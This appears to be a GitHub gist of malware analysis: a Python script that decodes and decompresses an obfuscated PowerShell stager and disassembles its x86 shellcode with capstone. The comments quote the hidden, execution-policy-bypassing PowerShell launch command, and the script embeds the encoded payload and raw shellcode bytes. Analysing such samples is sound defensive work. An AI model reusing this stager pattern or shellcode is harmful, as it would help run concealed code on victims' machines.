Skip to content

Instantly share code, notes, and snippets.

@strazzere
Last active July 21, 2023 14:11
Show Gist options
  • Save strazzere/5faa709a3db9e1dcf3b5 to your computer and use it in GitHub Desktop.
Save strazzere/5faa709a3db9e1dcf3b5 to your computer and use it in GitHub Desktop.
Dump encoded compress powershell stream
#!/usr/bin/python
#
#
# Decompling something being loaded in through powershell
#
#
# diff <[email protected]>
#
#
# It was basically this code;
# http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
#
#
# PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass -Command Invoke-Expression \
#$(New-Object IO.StreamReader \
#($(New-Object IO.Compression.DeflateStream \
#($(New-Object IO.MemoryStream (, $([Convert]::FromBase64String(" & str & ")))), [IO.Compression.CompressionMode]::Decompress)),
#[Text.Encoding]::ASCII)).ReadToEnd();"""
#
import base64
import zlib
encoded = "nVZNi+NGEL37VzRGB5uxh5Zan2sGdpMlsBBCYIbdg/Gh1WplRGTZ2PLGs0n+e/SeXJpMcgm5tPqjuj5evapW4NSDej+fbT+27af98XDqF/Nf/anzrYnuq7adL3fqeCnbxqlzb/vh46/9cK4+df3P/Ul9bk79xbYf2vbgFre931bq0nS9ut6+L7fvt+Xmf9v5/uRt75+eh08ldi43vV9X6tXybfY327edf1rfn7+6U/9fbO/9/uz7xb81T1HN38+CwwDkh6paP70cvVoPd0p/+ujrpmv65tCpwKn1T3bv1fxL05lortbdsDofrfOKOz9cOgfJs1of7fncP58us+D6EBzevXsDsl7pa6g1Pmb8xHq5UdvvXnq/3e2CMzKqr6UdTop0GOoMMgWu1cNQYeYrmWXxMEQYagyJx7IcBofTMhyG1MEWZgn0hckwaPNmmWPpcbeGsI9wDXsaqizuFjCZl2LIQMRh0BjCUJRyL0NcCfYMXcNejVODYEo6XoiIhckY8WoEmMGQg3ANawQiwcxb8a+AlgLCKYSzejrFtRh7JYFgqIgyh0iOa0kuwhXkEuYjlQN6WuFaSgy0eGoTgcRjr4D6DEOOA8dQtYBTOdkrjSQqwUGcS7zGi3GiFmdyN8JBAeM5FDjsOXhv6DjTg5mB9zFEIiydl4iIeAzNkROfYy+ocVaSSMBUv+rDtYw4w12NvQJDSIitIJkQCCusI0HSXJSSf0yyDyVKkvB1SGNhXVEIzjoRXwgEgzZW3GWAJA1h14QENyzDYoBMciQeEA3qS0g9KE0x5NRMXAiYESdzRKmZhUqskQzEmaklEAm5hlkaTiJGWEIMLEuDDPOSCpKVfMnIMGaa3MAyyt7IkX+OHNcC51hb0x5nrNo8FbAJxMh7KGXLINisUE2qELWpTCvcdRgKK6rI2AyIx7XEm+GAxRlBLsUyhuYCSFaZxEuvKELqsWYYbz15ReaweVhWSiGEKyEcFcIwVwq5rJYEEKE6FxF2hpp9jXVZS1aZ/TCTpLhcgKgLwYqusWmRUiw1cpw8oKfsomybIZZjLzZy16ayF5diiPwjatwb20gsuBBxtrmSHTOXpJBwI+soHApg5BXLtKBJ0pZA5KKPCio2X+aIBNbiKXnK6hm7SiWpZYPKveSNTXWsBS2w82GhFjZfZp98YdWyjpJiIlw+xcGeTZN8oyiXCVZEiHfpOJ8JXYhwmYoCFrZnI6NX2BubOdwYa4EvItsX1JOEZkooWcJcZoQzlT12THKSgBXsSNMe2wiXY+IBTkiYYNzj1NQiUrFg+U4bYR3bDbvoWB8T9cj2FAd8ZwwdiiQY0oI5yswUB1tkOWHFxxoReezlE37M5digtOTD0pAR/JhftkNmlSaZLT6VdHd8OogaOU6HCDbTSBJSgRelLHG+TGzrI5LTKz5mNRHAbCVpHF8/dlHizAwmm1l9OKlF0DzoTdCodeuHxdnd/+i7X/rndbgcdu/ulup3/E/dfui24x/dbhFc758Ow8JEi+Vd0CxXari6DZrdSoVL9Yc6XPp1d2nbzZ+z4Bv/yN78jg6orYLrCh/8iT329tSvH1vvj2r96N2hqxR+2LT+Cw=="
# [Convert]::FromBase64String
decoded = base64.b64decode(encoded)
# IO.Compression.DeflateStream
# 15 is the default parameter, negative makes it ignore the gzip header
decompressed = zlib.decompress(decoded, -15)
# Disassemble above code
from capstone import *
code = b"0xba\x96\xf7\x49\x1f\xd9\xed\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x6c\x31\x56\x15\x03\x56\x15\x83\xee\xfc\xe2\x63\x0b\xa1\x9d\x8b\xf4\x32\xc2\x02\x11\x03\xc2\x70\x51\x34\xf2\xf3\x37\xb9\x79\x51\xac\x4a\x0f\x7d\xc3\xfb\xba\x5b\xea\xfc\x97\x9f\x6d\x7f\xea\xf3\x4d\xbe\x25\x06\x8f\x87\x58\xea\xdd\x50\x16\x58\xf2\xd5\x62\x60\x79\xa5\x63\xe0\x9e\x7e\x85\xc1\x30\xf4\xdc\xc1\xb3\xd9\x54\x48\xac\x3e\x50\x03\x47\xf4\x2e\x92\x81\xc4\xcf\x38\xec\xe8\x3d\x41\x28\xce\xdd\x34\x40\x2c\x63\x4e\x97\x4e\xbf\xdb\x0c\xe8\x34\x7b\xe9\x08\x98\x1d\x7a\x06\x55\x6a\x24\x0b\x68\xbf\x5e\x37\xe1\x3e\xb1\xb1\xb1\x64\x15\x99\x62\x05\x0c\x47\xc4\x3a\x4e\x28\xb9\x9e\x04\xc5\xae\x93\x46\x82\x5e\xce\x0c\x52\xf7\x67\x84\x3c\x6e\xd3\x3e\x8d\x07\xfd\xb9\xf2\x3d\x30\x1d\x5f\xed\x61\xf2\x33\x79\xbf\xa2\xca\xde\x40\x9f\x7e\x72\xd4\x23\xd2\x27\x40\x9f\xd5\xc7\x90\x37\x03\xc7\x90\xc7\x83\x86\xe1\x93\xbe\x22\x49\x64\x02\x01\x25\xa3\xc2\xd6\xc6\x9a\x86\xb3\x78\x4f\x5f\x76\x0f\x2a\x66\x44\x9c\xd7\xca\xc7\x2a\x2c\xa5\x72\xfe\x22\x6a\x32\xa4\xd9\xe9\xb5\x29\x55\xcb\x0b\xa0\x30\x40\xf8\x55\xba\xf1\x53\xef\x6e\xce\x17\x79\xc8\x64\xf9\xe1\xa5\x11\x9e\x81\x7a\x8d\x22\x2b\x31\x12\x96\xf3\xa5\xa6\x96\x4b\x79\x82\x4f\x4b\xd5\x64\xc7\xc2\x4a\xb2\x18\x01\xfd\xfd\xb4\xc1\xfe\x33\xdb\x95\xac\x60\x48\xc2\x01\xd1\x06\x07\xf0\xf3\xed\x28\x2e\x9d\x78\xdc\x8e\xca\xfc\xd3\x30\x0b\x74\xf3\x5b\x0f\xd6\x99\x84\x59\xbe\x28\xfd\xfb\xb8\x2d\xd4\x57\x96\x82\x84\x01\x70\x09\x2d\xb6\xfb\xae\xe4\x43\x3b\x25\x0f\x03\xc9\x1c\xe7\xd7\x31\x9e\xf8\x8d\x71\xf6\xf8\x41\x72\x06\x91\x61\x72\x46\x61\x31\x1a\x1e\xc5\xe6\x3f\x61\xd0\x9a\x93\xce\x52\x7b\x44\x98\x64\xa4\x6b\x58\x36\xf2\x03\x4a\x2e\x73\x31\x95\x9b\x01\x76\x1d\xeb\x81\x70\xdc\x30\x10\xbe\xab\x53\x43\xfc\x0c\x74\x03\xfd\x4d\x7b\xdd\x38\x83\xaa\x2f\x0d\xdb\x9c\x7e\x43\x2c\xcf\xb1\x91\x6a\x0f\x09\x25\x3f\xad\x3b\xac\x3f\xe1\x3c\xe5"
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(code, 0x1000):
print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
# 0x1000: xor byte ptr [eax + 0x62], bh
# 0x1003: popal
# 0x1004: xchg eax, esi
# 0x1005: test dword ptr [ecx + 0x1f], 0x74d9edd9
# 0x100c: and al, 0xf4
# 0x100e: pop esi
# 0x100f: sub ecx, ecx
# 0x1011: mov cl, 0x6c
# 0x1013: xor dword ptr [esi + 0x15], edx
# 0x1016: add edx, dword ptr [esi + 0x15]
# 0x1019: sub esi, -4
# 0x101c: loop 0x1081
# 0x101e: or esp, dword ptr [ecx + 0x32f48b9d]
# 0x1024: ret 0x1102
# 0x1027: add eax, edx
# 0x1029: jo 0x107c
# 0x102b: xor al, 0xf2
# 0x102d: aaa
# 0x102f: mov ecx, 0x4aac5179
@snappyJack
Copy link

this solved me problem! awesome !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment